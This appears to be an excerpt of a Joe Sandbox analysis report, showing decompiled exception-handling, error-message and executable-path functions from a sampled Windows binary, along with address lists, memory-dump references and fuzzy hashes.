                                                                                                                                                                                                                                                        0x7ff6e5abe154
                                                                                                                                                                                                                                                        0x7ff6e5abe15d
                                                                                                                                                                                                                                                        0x7ff6e5abe166
                                                                                                                                                                                                                                                        0x7ff6e5abe16f
                                                                                                                                                                                                                                                        0x7ff6e5abe178
                                                                                                                                                                                                                                                        0x7ff6e5abe17c
                                                                                                                                                                                                                                                        0x7ff6e5abe18c
                                                                                                                                                                                                                                                        0x7ff6e5abe194
                                                                                                                                                                                                                                                        0x7ff6e5abe199
                                                                                                                                                                                                                                                        0x7ff6e5abe19e
                                                                                                                                                                                                                                                        0x7ff6e5abe1a3
                                                                                                                                                                                                                                                        0x7ff6e5abe1aa
                                                                                                                                                                                                                                                        0x7ff6e5abe1c6

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                                                                                                                                                        • Instruction ID: 420aec1f2fc12f73f31b7dd8f4b17305b705099fb7f57bbd2e92391d8ccef8af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3261AD33B08B498AEB509F69E4903AD77A0FB44B88F144225EF4D97B98CF39E490C745
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABE464(void* __ecx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                        				long long _v40;
                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                        				signed int* _v56;
                                                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                                                                        				signed int* _t116;
                                                                                                                                                                                                                                                        				intOrPtr* _t137;
                                                                                                                                                                                                                                                        				void* _t140;
                                                                                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                                                                        				void* _t159;
                                                                                                                                                                                                                                                        				void* _t160;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t110 = _t145;
                                                                                                                                                                                                                                                        				 *((long long*)(_t110 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t110 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t110 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t110 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_t137 = __rcx;
                                                                                                                                                                                                                                                        				_t140 = __r9;
                                                                                                                                                                                                                                                        				_t160 = __r8;
                                                                                                                                                                                                                                                        				_t143 = __rdx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCCC4(_t55, __r8);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t110);
                                                                                                                                                                                                                                                        				_t116 = _a40;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t110 + 0x40)) != 0) goto 0xe5abe4e6;
                                                                                                                                                                                                                                                        				if ( *__rcx == 0xe06d7363) goto 0xe5abe4e6;
                                                                                                                                                                                                                                                        				if ( *__rcx != 0x80000029) goto 0xe5abe4ca;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0xe5abe4ce;
                                                                                                                                                                                                                                                        				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0xe5abe4e6;
                                                                                                                                                                                                                                                        				if ( *__rcx == 0x80000026) goto 0xe5abe4e6;
                                                                                                                                                                                                                                                        				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xe5abe4e6;
                                                                                                                                                                                                                                                        				if ((_t116[9] & 0x00000001) != 0) goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0xe5abe57e;
                                                                                                                                                                                                                                                        				if (_t116[1] == 0) goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if (_a48 != 0) goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0xe5abe56b;
                                                                                                                                                                                                                                                        				if ( *__rcx != 0x80000026) goto 0xe5abe549;
                                                                                                                                                                                                                                                        				_t60 = E00007FF67FF6E5ABD834(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                                                                                                                                                                        				if (_t60 - 0xffffffff < 0) goto 0xe5abe695;
                                                                                                                                                                                                                                                        				if (_t60 - _t116[1] >= 0) goto 0xe5abe695;
                                                                                                                                                                                                                                                        				r9d = _t60;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABEA14(_t110, _t143, __r9, _t116);
                                                                                                                                                                                                                                                        				goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if ( *_t137 != 0x80000029) goto 0xe5abe56b;
                                                                                                                                                                                                                                                        				r9d =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                                                                                                                                                                        				if (r9d - 0xffffffff < 0) goto 0xe5abe695;
                                                                                                                                                                                                                                                        				if (r9d - _t116[1] >= 0) goto 0xe5abe695;
                                                                                                                                                                                                                                                        				goto 0xe5abe539;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD2AC(r9d - _t116[1], _t110, _t116, __r9, __r9, _t116);
                                                                                                                                                                                                                                                        				goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if (_t116[3] != 0) goto 0xe5abe5c6;
                                                                                                                                                                                                                                                        				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0xe5abe5a6;
                                                                                                                                                                                                                                                        				_t102 = _t116[8];
                                                                                                                                                                                                                                                        				if (_t102 == 0) goto 0xe5abe5a6;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6B0(_t110);
                                                                                                                                                                                                                                                        				if (_t102 != 0) goto 0xe5abe5c6;
                                                                                                                                                                                                                                                        				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0xe5abe675;
                                                                                                                                                                                                                                                        				if ( *_t137 != 0xe06d7363) goto 0xe5abe63c;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t137 + 0x18)) - 3 < 0) goto 0xe5abe63c;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t137 + 0x20)) - 0x19930522 <= 0) goto 0xe5abe63c;
                                                                                                                                                                                                                                                        				_t112 =  *((intOrPtr*)(_t137 + 0x30));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t112 + 8)) == 0) goto 0xe5abe63c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6C4(_t112);
                                                                                                                                                                                                                                                        				if (_t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)) == 0) goto 0xe5abe63c;
                                                                                                                                                                                                                                                        				_v32 = _a64 & 0x000000ff;
                                                                                                                                                                                                                                                        				_v40 = _a56;
                                                                                                                                                                                                                                                        				_v48 = _a48;
                                                                                                                                                                                                                                                        				_v56 = _t116;
                                                                                                                                                                                                                                                        				 *0xe5ada428(_t159);
                                                                                                                                                                                                                                                        				goto 0xe5abe67a;
                                                                                                                                                                                                                                                        				_v32 = _a56;
                                                                                                                                                                                                                                                        				_v40 = _a48;
                                                                                                                                                                                                                                                        				_v48 = _a64;
                                                                                                                                                                                                                                                        				_v56 = _t116;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABDC30(_a64 & 0x000000ff, 0x80000026, __esi, _t137, _t143, _t160, _t140, _t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)));
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                        0x7ff6e5abe464
                                                                                                                                                                                                                                                        0x7ff6e5abe467
                                                                                                                                                                                                                                                        0x7ff6e5abe46b
                                                                                                                                                                                                                                                        0x7ff6e5abe46f
                                                                                                                                                                                                                                                        0x7ff6e5abe473
                                                                                                                                                                                                                                                        0x7ff6e5abe47d
                                                                                                                                                                                                                                                        0x7ff6e5abe480
                                                                                                                                                                                                                                                        0x7ff6e5abe486
                                                                                                                                                                                                                                                        0x7ff6e5abe489
                                                                                                                                                                                                                                                        0x7ff6e5abe48c
                                                                                                                                                                                                                                                        0x7ff6e5abe491
                                                                                                                                                                                                                                                        0x7ff6e5abe496
                                                                                                                                                                                                                                                        0x7ff6e5abe4ac
                                                                                                                                                                                                                                                        0x7ff6e5abe4b4
                                                                                                                                                                                                                                                        0x7ff6e5abe4b8
                                                                                                                                                                                                                                                        0x7ff6e5abe4be
                                                                                                                                                                                                                                                        0x7ff6e5abe4c8
                                                                                                                                                                                                                                                        0x7ff6e5abe4cc
                                                                                                                                                                                                                                                        0x7ff6e5abe4da
                                                                                                                                                                                                                                                        0x7ff6e5abe4e0
                                                                                                                                                                                                                                                        0x7ff6e5abe4ea
                                                                                                                                                                                                                                                        0x7ff6e5abe4f4
                                                                                                                                                                                                                                                        0x7ff6e5abe502
                                                                                                                                                                                                                                                        0x7ff6e5abe50c
                                                                                                                                                                                                                                                        0x7ff6e5abe510
                                                                                                                                                                                                                                                        0x7ff6e5abe51c
                                                                                                                                                                                                                                                        0x7ff6e5abe524
                                                                                                                                                                                                                                                        0x7ff6e5abe52d
                                                                                                                                                                                                                                                        0x7ff6e5abe533
                                                                                                                                                                                                                                                        0x7ff6e5abe53f
                                                                                                                                                                                                                                                        0x7ff6e5abe544
                                                                                                                                                                                                                                                        0x7ff6e5abe54b
                                                                                                                                                                                                                                                        0x7ff6e5abe54d
                                                                                                                                                                                                                                                        0x7ff6e5abe555
                                                                                                                                                                                                                                                        0x7ff6e5abe55f
                                                                                                                                                                                                                                                        0x7ff6e5abe569
                                                                                                                                                                                                                                                        0x7ff6e5abe574
                                                                                                                                                                                                                                                        0x7ff6e5abe579
                                                                                                                                                                                                                                                        0x7ff6e5abe582
                                                                                                                                                                                                                                                        0x7ff6e5abe590
                                                                                                                                                                                                                                                        0x7ff6e5abe592
                                                                                                                                                                                                                                                        0x7ff6e5abe596
                                                                                                                                                                                                                                                        0x7ff6e5abe598
                                                                                                                                                                                                                                                        0x7ff6e5abe5a4
                                                                                                                                                                                                                                                        0x7ff6e5abe5b2
                                                                                                                                                                                                                                                        0x7ff6e5abe5c0
                                                                                                                                                                                                                                                        0x7ff6e5abe5cc
                                                                                                                                                                                                                                                        0x7ff6e5abe5d2
                                                                                                                                                                                                                                                        0x7ff6e5abe5db
                                                                                                                                                                                                                                                        0x7ff6e5abe5dd
                                                                                                                                                                                                                                                        0x7ff6e5abe5e5
                                                                                                                                                                                                                                                        0x7ff6e5abe5e7
                                                                                                                                                                                                                                                        0x7ff6e5abe5fa
                                                                                                                                                                                                                                                        0x7ff6e5abe611
                                                                                                                                                                                                                                                        0x7ff6e5abe620
                                                                                                                                                                                                                                                        0x7ff6e5abe628
                                                                                                                                                                                                                                                        0x7ff6e5abe62f
                                                                                                                                                                                                                                                        0x7ff6e5abe634
                                                                                                                                                                                                                                                        0x7ff6e5abe63a
                                                                                                                                                                                                                                                        0x7ff6e5abe647
                                                                                                                                                                                                                                                        0x7ff6e5abe659
                                                                                                                                                                                                                                                        0x7ff6e5abe667
                                                                                                                                                                                                                                                        0x7ff6e5abe66b
                                                                                                                                                                                                                                                        0x7ff6e5abe670
                                                                                                                                                                                                                                                        0x7ff6e5abe694

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                                                                                                                                                        • Instruction ID: 94feff236ebffe8be3e02e6caa88a9d0253c282da1706e06fb59127e6fc41e86
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47518233B0828686DAB4AF19D16436877A0FF54F88F144135DA9CC7B99CF3DE850878A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB24D0(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, char _a6232) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                                                        				signed long long _t44;
                                                                                                                                                                                                                                                        				signed long long _t45;
                                                                                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				_a24 = __r8;
                                                                                                                                                                                                                                                        				_a32 = __r9;
                                                                                                                                                                                                                                                        				_t22 = E00007FF67FF6E5ABADB0(0x1840, __rax, _t74, _t75);
                                                                                                                                                                                                                                                        				_t65 = _t64 - __rax;
                                                                                                                                                                                                                                                        				_t44 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t45 = _t44 ^ _t64 - __rax;
                                                                                                                                                                                                                                                        				_a6168 = _t45;
                                                                                                                                                                                                                                                        				_t46 = __rdx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1040(_t22);
                                                                                                                                                                                                                                                        				_a16 =  &_a6232;
                                                                                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3BE4(_t38, _t39,  *_t45 | 0x00000002,  &_a1048, __r8, __rdx);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t45);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4464( *_t45, _t45, __rdx,  &_a6232);
                                                                                                                                                                                                                                                        				_a16 = _t45;
                                                                                                                                                                                                                                                        				_a8 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1B30(_t45,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
                                                                                                                                                                                                                                                        				r8d = 0x800;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t45, _t46,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
                                                                                                                                                                                                                                                        				if (_t45 == 0) goto 0xe5ab25df;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t45, _t46,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				MessageBoxW(??, ??, ??, ??);
                                                                                                                                                                                                                                                        				goto 0xe5ab25f9;
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t65);
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ab24d0
                                                                                                                                                                                                                                                        0x7ff6e5ab24d5
                                                                                                                                                                                                                                                        0x7ff6e5ab24da
                                                                                                                                                                                                                                                        0x7ff6e5ab24e7
                                                                                                                                                                                                                                                        0x7ff6e5ab24ec
                                                                                                                                                                                                                                                        0x7ff6e5ab24ef
                                                                                                                                                                                                                                                        0x7ff6e5ab24f6
                                                                                                                                                                                                                                                        0x7ff6e5ab24f9
                                                                                                                                                                                                                                                        0x7ff6e5ab2501
                                                                                                                                                                                                                                                        0x7ff6e5ab250f
                                                                                                                                                                                                                                                        0x7ff6e5ab2514
                                                                                                                                                                                                                                                        0x7ff6e5ab2524
                                                                                                                                                                                                                                                        0x7ff6e5ab252d
                                                                                                                                                                                                                                                        0x7ff6e5ab253a
                                                                                                                                                                                                                                                        0x7ff6e5ab253f
                                                                                                                                                                                                                                                        0x7ff6e5ab2546
                                                                                                                                                                                                                                                        0x7ff6e5ab254b
                                                                                                                                                                                                                                                        0x7ff6e5ab255f
                                                                                                                                                                                                                                                        0x7ff6e5ab256e
                                                                                                                                                                                                                                                        0x7ff6e5ab257d
                                                                                                                                                                                                                                                        0x7ff6e5ab2583
                                                                                                                                                                                                                                                        0x7ff6e5ab2588
                                                                                                                                                                                                                                                        0x7ff6e5ab259b
                                                                                                                                                                                                                                                        0x7ff6e5ab25a3
                                                                                                                                                                                                                                                        0x7ff6e5ab25a5
                                                                                                                                                                                                                                                        0x7ff6e5ab25ba
                                                                                                                                                                                                                                                        0x7ff6e5ab25bf
                                                                                                                                                                                                                                                        0x7ff6e5ab25d7
                                                                                                                                                                                                                                                        0x7ff6e5ab25dd
                                                                                                                                                                                                                                                        0x7ff6e5ab25df
                                                                                                                                                                                                                                                        0x7ff6e5ab2613

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                        • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                        • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                                                                                                                                                        • Instruction ID: 5b94958b3fc871cc6dad9c564ee3b2e2f3d83634910c73ac17348c53d195cb57
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2631747372868191E760EB14E4617EA6365FF84B84F804036EA8DC7689DF3DDB05CB89
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB3BA0(void* __rax, long long __rcx, char _a24, signed int _a8216) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				intOrPtr _t16;
                                                                                                                                                                                                                                                        				signed long long _t21;
                                                                                                                                                                                                                                                        				signed long long _t22;
                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x2030, __rax, _t40, _t41);
                                                                                                                                                                                                                                                        				_t36 = _t35 - __rax;
                                                                                                                                                                                                                                                        				_t21 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t22 = _t21 ^ _t35 - __rax;
                                                                                                                                                                                                                                                        				_a8216 = _t22;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0xe5ab3bf2;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2620(GetModuleFileNameW(??, ??, ??), _t22, "GetModuleFileNameW", "Failed to get executable path.\n", _t38, _t39);
                                                                                                                                                                                                                                                        				goto 0xe5ab3c1f;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7B40(_t16, __rcx, __rcx,  &_a24, _t33, _t34, _t38);
                                                                                                                                                                                                                                                        				if (_t22 != 0) goto 0xe5ab3c1a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t22, "Failed to convert executable path to UTF-8.\n",  &_a24, _t38, _t39);
                                                                                                                                                                                                                                                        				goto 0xe5ab3c1f;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(1, 0, _a8216 ^ _t36);
                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                        0x7ff6e5ab3ba7
                                                                                                                                                                                                                                                        0x7ff6e5ab3bac
                                                                                                                                                                                                                                                        0x7ff6e5ab3baf
                                                                                                                                                                                                                                                        0x7ff6e5ab3bb6
                                                                                                                                                                                                                                                        0x7ff6e5ab3bb9
                                                                                                                                                                                                                                                        0x7ff6e5ab3bcb
                                                                                                                                                                                                                                                        0x7ff6e5ab3bd9
                                                                                                                                                                                                                                                        0x7ff6e5ab3be9
                                                                                                                                                                                                                                                        0x7ff6e5ab3bf0
                                                                                                                                                                                                                                                        0x7ff6e5ab3bf2
                                                                                                                                                                                                                                                        0x7ff6e5ab3c00
                                                                                                                                                                                                                                                        0x7ff6e5ab3c08
                                                                                                                                                                                                                                                        0x7ff6e5ab3c11
                                                                                                                                                                                                                                                        0x7ff6e5ab3c18
                                                                                                                                                                                                                                                        0x7ff6e5ab3c37

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6E5AB3699), ref: 00007FF6E5AB3BD1
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E5AB7744,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB2654
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: MessageBoxW.USER32 ref: 00007FF6E5AB272C
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                        • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                        • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                                                                                                                                                        • Instruction ID: 994d92ff964108e05a709eb2bf50f7b8f42f0432141f2fc8a0705ceaf73275dc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE01F733B1C64680FAA1BF28D8353B51351AF08F84F800032D90EC668AEE5EED44DB4A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

